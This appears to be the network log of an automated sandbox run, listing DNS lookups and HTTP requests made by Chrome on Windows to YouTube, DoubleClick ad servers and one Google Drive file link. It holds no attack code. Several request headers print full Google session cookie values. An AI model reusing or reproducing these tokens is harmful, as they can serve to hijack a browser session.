                                    IN A
                                    216.58.213.14
                                  • flag-gb
                                    GET
                                    https://youtube.com/
                                    chrome.exe
                                    Remote address:
                                    216.58.213.14:443
                                    Request
                                    GET / HTTP/2.0
                                    host: youtube.com
                                    pragma: no-cache
                                    cache-control: no-cache
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    origin: https://www.youtube.com
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://youtube.com/
                                    chrome.exe
                                    Remote address:
                                    216.58.213.14:443
                                    Request
                                    GET / HTTP/2.0
                                    host: youtube.com
                                    pragma: no-cache
                                    cache-control: no-cache
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    origin: https://www.youtube.com
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    69.31.126.40.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    69.31.126.40.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    95.221.229.192.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    95.221.229.192.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    17.160.190.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    17.160.190.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    consent.youtube.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    consent.youtube.com
                                    IN A
                                    Response
                                    consent.youtube.com
                                    IN A
                                    142.250.200.46
                                  • flag-us
                                    DNS
                                    consent.youtube.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    consent.youtube.com
                                    IN A
                                  • flag-us
                                    DNS
                                    static.doubleclick.net
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    static.doubleclick.net
                                    IN A
                                    Response
                                    static.doubleclick.net
                                    IN A
                                    142.250.187.230
                                  • flag-gb
                                    GET
                                    https://static.doubleclick.net/instream/ad_status.js
                                    chrome.exe
                                    Remote address:
                                    142.250.187.230:443
                                    Request
                                    GET /instream/ad_status.js HTTP/2.0
                                    host: static.doubleclick.net
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    230.187.250.142.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    230.187.250.142.in-addr.arpa
                                    IN PTR
                                    Response
                                    230.187.250.142.in-addr.arpa
                                    IN PTR
                                    lhr25s34-in-f61e100net
                                  • flag-us
                                    DNS
                                    googleads.g.doubleclick.net
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    googleads.g.doubleclick.net
                                    IN A
                                    Response
                                    googleads.g.doubleclick.net
                                    IN A
                                    216.58.201.98
                                  • flag-gb
                                    GET
                                    https://googleads.g.doubleclick.net/pagead/id
                                    chrome.exe
                                    Remote address:
                                    216.58.201.98:443
                                    Request
                                    GET /pagead/id HTTP/2.0
                                    host: googleads.g.doubleclick.net
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    origin: https://www.youtube.com
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://googleads.g.doubleclick.net/pagead/id?slf_rd=1
                                    chrome.exe
                                    Remote address:
                                    216.58.201.98:443
                                    Request
                                    GET /pagead/id?slf_rd=1 HTTP/2.0
                                    host: googleads.g.doubleclick.net
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-full-version: "123.0.6312.123"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    origin: https://www.youtube.com
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-us
                                    DNS
                                    98.201.58.216.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    98.201.58.216.in-addr.arpa
                                    IN PTR
                                    Response
                                    98.201.58.216.in-addr.arpa
                                    IN PTR
                                    prg03s02-in-f21e100net
                                    98.201.58.216.in-addr.arpa
                                    IN PTR
                                    prg03s02-in-f98�G
                                    98.201.58.216.in-addr.arpa
                                    IN PTR
                                    lhr48s48-in-f2�G
                                  • flag-us
                                    DNS
                                    241.150.49.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    241.150.49.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    50.23.12.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    50.23.12.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    209.205.72.20.in-addr.arpa
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    209.205.72.20.in-addr.arpa
                                    IN PTR
                                    Response
                                  • flag-us
                                    DNS
                                    drive.google.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    drive.google.com
                                    IN A
                                    Response
                                    drive.google.com
                                    IN A
                                    172.217.169.78
                                  • flag-us
                                    DNS
                                    drive.google.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    drive.google.com
                                    IN A
                                    Response
                                    drive.google.com
                                    IN A
                                    172.217.169.78
                                  • flag-gb
                                    GET
                                    https://drive.google.com/file/d/1h8JICIA-04JL-lbd-QjlgqIibo65-pWv/view?usp=sharing
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /file/d/1h8JICIA-04JL-lbd-QjlgqIibo65-pWv/view?usp=sharing HTTP/2.0
                                    host: drive.google.com
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: navigate
                                    sec-fetch-user: ?1
                                    sec-fetch-dest: document
                                    referer: https://www.youtube.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                  • flag-gb
                                    GET
                                    https://drive.google.com/auth_warmup
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /auth_warmup HTTP/2.0
                                    host: drive.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: navigate
                                    sec-fetch-dest: iframe
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                    cookie: NID=520=q4nQKPQR5PGVPPDCe63oek9L0CSBzHsx4xU6EwsNUtXd9b_9_n42rGxfalODql5NvG9CUqAecz9FySK3I6WrfvXyFmWDYQUasje52Xe9X2aps7c9sD1itZxhlBN97V5YampPmauX89-U2oF2bPtMLESw6kgVHkwngq4jmoYDip_TWas
                                  • flag-gb
                                    GET
                                    https://drive.google.com/drivesharing/clientmodel?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&foreignService=texmex&authuser=0&origin=https%3A%2F%2Fdrive.google.com
                                    chrome.exe
                                    Remote address:
                                    172.217.169.78:443
                                    Request
                                    GET /drivesharing/clientmodel?id=1h8JICIA-04JL-lbd-QjlgqIibo65-pWv&foreignService=texmex&authuser=0&origin=https%3A%2F%2Fdrive.google.com HTTP/2.0
                                    host: drive.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    sec-ch-ua-platform: "Windows"
                                    upgrade-insecure-requests: 1
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                    sec-ch-ua-arch: "x86"
                                    sec-ch-ua-platform-version: "10.0.0"
                                    sec-ch-ua-model: ""
                                    sec-ch-ua-bitness: "64"
                                    sec-ch-ua-wow64: ?0
                                    sec-ch-ua-full-version-list: "Google Chrome";v="123.0.6312.123", "Not:A-Brand";v="8.0.0.0", "Chromium";v="123.0.6312.123"
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-origin
                                    sec-fetch-mode: navigate
                                    sec-fetch-dest: iframe
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                    cookie: NID=520=q4nQKPQR5PGVPPDCe63oek9L0CSBzHsx4xU6EwsNUtXd9b_9_n42rGxfalODql5NvG9CUqAecz9FySK3I6WrfvXyFmWDYQUasje52Xe9X2aps7c9sD1itZxhlBN97V5YampPmauX89-U2oF2bPtMLESw6kgVHkwngq4jmoYDip_TWas
                                  • flag-us
                                    DNS
                                    ogads-pa.googleapis.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ogads-pa.googleapis.com
                                    IN A
                                    Response
                                    ogads-pa.googleapis.com
                                    IN A
                                    216.58.213.10
                                    ogads-pa.googleapis.com
                                    IN A
                                    142.250.178.10
                                    ogads-pa.googleapis.com
                                    IN A
                                    172.217.169.74
                                    ogads-pa.googleapis.com
                                    IN A
                                    172.217.16.234
                                    ogads-pa.googleapis.com
                                    IN A
                                    172.217.169.10
                                    ogads-pa.googleapis.com
                                    IN A
                                    216.58.212.202
                                    ogads-pa.googleapis.com
                                    IN A
                                    142.250.200.10
                                    ogads-pa.googleapis.com
                                    IN A
                                    142.250.200.42
                                    ogads-pa.googleapis.com
                                    IN A
                                    142.250.187.234
                                    ogads-pa.googleapis.com
                                    IN A
                                    216.58.204.74
                                    ogads-pa.googleapis.com
                                    IN A
                                    216.58.201.106
                                    ogads-pa.googleapis.com
                                    IN A
                                    142.250.187.202
                                    ogads-pa.googleapis.com
                                    IN A
                                    142.250.179.234
                                    ogads-pa.googleapis.com
                                    IN A
                                    142.250.180.10
                                    ogads-pa.googleapis.com
                                    IN A
                                    172.217.169.42
                                  • flag-us
                                    DNS
                                    apis.google.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    apis.google.com
                                    IN A
                                    Response
                                    apis.google.com
                                    IN CNAME
                                    plus.l.google.com
                                    plus.l.google.com
                                    IN A
                                    142.250.178.14
                                  • flag-gb
                                    GET
                                    https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0
                                    chrome.exe
                                    Remote address:
                                    142.250.178.14:443
                                    Request
                                    GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_0 HTTP/2.0
                                    host: apis.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                    cookie: NID=520=q4nQKPQR5PGVPPDCe63oek9L0CSBzHsx4xU6EwsNUtXd9b_9_n42rGxfalODql5NvG9CUqAecz9FySK3I6WrfvXyFmWDYQUasje52Xe9X2aps7c9sD1itZxhlBN97V5YampPmauX89-U2oF2bPtMLESw6kgVHkwngq4jmoYDip_TWas
                                  • flag-gb
                                    GET
                                    https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_1
                                    chrome.exe
                                    Remote address:
                                    142.250.178.14:443
                                    Request
                                    GET /_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=client/exm=gapi_iframes,googleapis_client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo9xAAkaXO7Lqf7-9uTpZLtrkpWaXQ/cb=gapi.loaded_1 HTTP/2.0
                                    host: apis.google.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: */*
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: script
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                    cookie: NID=520=q4nQKPQR5PGVPPDCe63oek9L0CSBzHsx4xU6EwsNUtXd9b_9_n42rGxfalODql5NvG9CUqAecz9FySK3I6WrfvXyFmWDYQUasje52Xe9X2aps7c9sD1itZxhlBN97V5YampPmauX89-U2oF2bPtMLESw6kgVHkwngq4jmoYDip_TWas
                                  • flag-us
                                    DNS
                                    youtube.googleapis.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    youtube.googleapis.com
                                    IN A
                                    Response
                                    youtube.googleapis.com
                                    IN A
                                    216.58.204.74
                                    youtube.googleapis.com
                                    IN A
                                    172.217.169.10
                                    youtube.googleapis.com
                                    IN A
                                    142.250.187.234
                                    youtube.googleapis.com
                                    IN A
                                    142.250.200.10
                                    youtube.googleapis.com
                                    IN A
                                    216.58.212.234
                                    youtube.googleapis.com
                                    IN A
                                    142.250.187.202
                                    youtube.googleapis.com
                                    IN A
                                    172.217.16.234
                                    youtube.googleapis.com
                                    IN A
                                    216.58.201.106
                                    youtube.googleapis.com
                                    IN A
                                    216.58.213.10
                                    youtube.googleapis.com
                                    IN A
                                    172.217.169.74
                                    youtube.googleapis.com
                                    IN A
                                    142.250.179.234
                                    youtube.googleapis.com
                                    IN A
                                    172.217.169.42
                                    youtube.googleapis.com
                                    IN A
                                    142.250.178.10
                                    youtube.googleapis.com
                                    IN A
                                    142.250.200.42
                                    youtube.googleapis.com
                                    IN A
                                    142.250.180.10
                                    youtube.googleapis.com
                                    IN A
                                    216.58.212.202
                                  • flag-us
                                    DNS
                                    youtube.googleapis.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    youtube.googleapis.com
                                    IN A
                                    Response
                                    youtube.googleapis.com
                                    IN A
                                    142.250.187.202
                                    youtube.googleapis.com
                                    IN A
                                    142.250.200.10
                                    youtube.googleapis.com
                                    IN A
                                    216.58.204.74
                                    youtube.googleapis.com
                                    IN A
                                    172.217.169.42
                                    youtube.googleapis.com
                                    IN A
                                    172.217.169.74
                                    youtube.googleapis.com
                                    IN A
                                    142.250.180.10
                                    youtube.googleapis.com
                                    IN A
                                    216.58.213.10
                                    youtube.googleapis.com
                                    IN A
                                    142.250.187.234
                                    youtube.googleapis.com
                                    IN A
                                    172.217.169.10
                                    youtube.googleapis.com
                                    IN A
                                    142.250.179.234
                                    youtube.googleapis.com
                                    IN A
                                    216.58.201.106
                                    youtube.googleapis.com
                                    IN A
                                    216.58.212.234
                                    youtube.googleapis.com
                                    IN A
                                    142.250.200.42
                                    youtube.googleapis.com
                                    IN A
                                    142.250.178.10
                                    youtube.googleapis.com
                                    IN A
                                    172.217.16.234
                                    youtube.googleapis.com
                                    IN A
                                    216.58.212.202
                                  • flag-gb
                                    POST
                                    https://play.google.com/log?format=json&hasfast=true
                                    chrome.exe
                                    Remote address:
                                    142.250.179.238:443
                                    Request
                                    POST /log?format=json&hasfast=true HTTP/2.0
                                    host: play.google.com
                                    content-length: 4146
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    content-type: text/plain;charset=UTF-8
                                    accept: */*
                                    origin: https://drive.google.com
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                    cookie: NID=520=q4nQKPQR5PGVPPDCe63oek9L0CSBzHsx4xU6EwsNUtXd9b_9_n42rGxfalODql5NvG9CUqAecz9FySK3I6WrfvXyFmWDYQUasje52Xe9X2aps7c9sD1itZxhlBN97V5YampPmauX89-U2oF2bPtMLESw6kgVHkwngq4jmoYDip_TWas
                                  • flag-gb
                                    POST
                                    https://play.google.com/log?format=json&hasfast=true
                                    chrome.exe
                                    Remote address:
                                    142.250.179.238:443
                                    Request
                                    POST /log?format=json&hasfast=true HTTP/2.0
                                    host: play.google.com
                                    content-length: 7040
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-platform: "Windows"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    content-type: text/plain;charset=UTF-8
                                    accept: */*
                                    origin: https://drive.google.com
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: same-site
                                    sec-fetch-mode: cors
                                    sec-fetch-dest: empty
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                    cookie: __Secure-ENID=22.SE=fs68Grc-A3pr0jx9iPc7ZyvetbkWOWkL5oA1ZsBuzkYDdHgEaGMvHzIBII7P_waCTq_MqXHM_DDrVoxJr2E2ITdBacX7fG6rpmdMwaF3KvZW1Cq5VwFncU2a9x-aeGZo7v5LkDFZB0e2538bljopO1qW4Y0jj25ap7tfdNAY59XqdsAkXNRfE5Ll8YiXL9Tvj_o
                                    cookie: NID=520=Y_D3NHhdlkn7N4N_7pmZQZquYIKR94iYGxA_PRxeH5nphggJh2k2AhFz8nTtOT5vNuiHu87A63P-8sS_CwXOXYWG3R1ijlg8pN3vCcqxeP0_oV3iOJRra8DXu0rGzCqi9qKU9T0LELYq5YtQW2JTrHuRotvI313Fm9opCA1Z9ugUYRjxss0pbLg
                                  • flag-us
                                    DNS
                                    ssl.gstatic.com
                                    chrome.exe
                                    Remote address:
                                    8.8.8.8:53
                                    Request
                                    ssl.gstatic.com
                                    IN A
                                    Response
                                    ssl.gstatic.com
                                    IN A
                                    142.250.200.3
                                  • flag-gb
                                    GET
                                    https://ssl.gstatic.com/docs/common/cleardot.gif?zx=dtsxs6oy4flb
                                    chrome.exe
                                    Remote address:
                                    142.250.200.3:443
                                    Request
                                    GET /docs/common/cleardot.gif?zx=dtsxs6oy4flb HTTP/2.0
                                    host: ssl.gstatic.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    referer: https://drive.google.com/
                                    accept-encoding: gzip, deflate, br, zstd
                                    accept-language: en-US,en;q=0.9
                                  • flag-gb
                                    GET
                                    https://ssl.gstatic.com/docs/common/viewer/v3/v-sprite62.svg
                                    chrome.exe
                                    Remote address:
                                    142.250.200.3:443
                                    Request
                                    GET /docs/common/viewer/v3/v-sprite62.svg HTTP/2.0
                                    host: ssl.gstatic.com
                                    sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
                                    sec-ch-ua-mobile: ?0
                                    user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
                                    sec-ch-ua-platform: "Windows"
                                    accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                    x-client-data: CM2QywE=
                                    sec-fetch-site: cross-site
                                    sec-fetch-mode: no-cors
                                    sec-fetch-dest: image
                                    referer: https://www.gstatic.com/
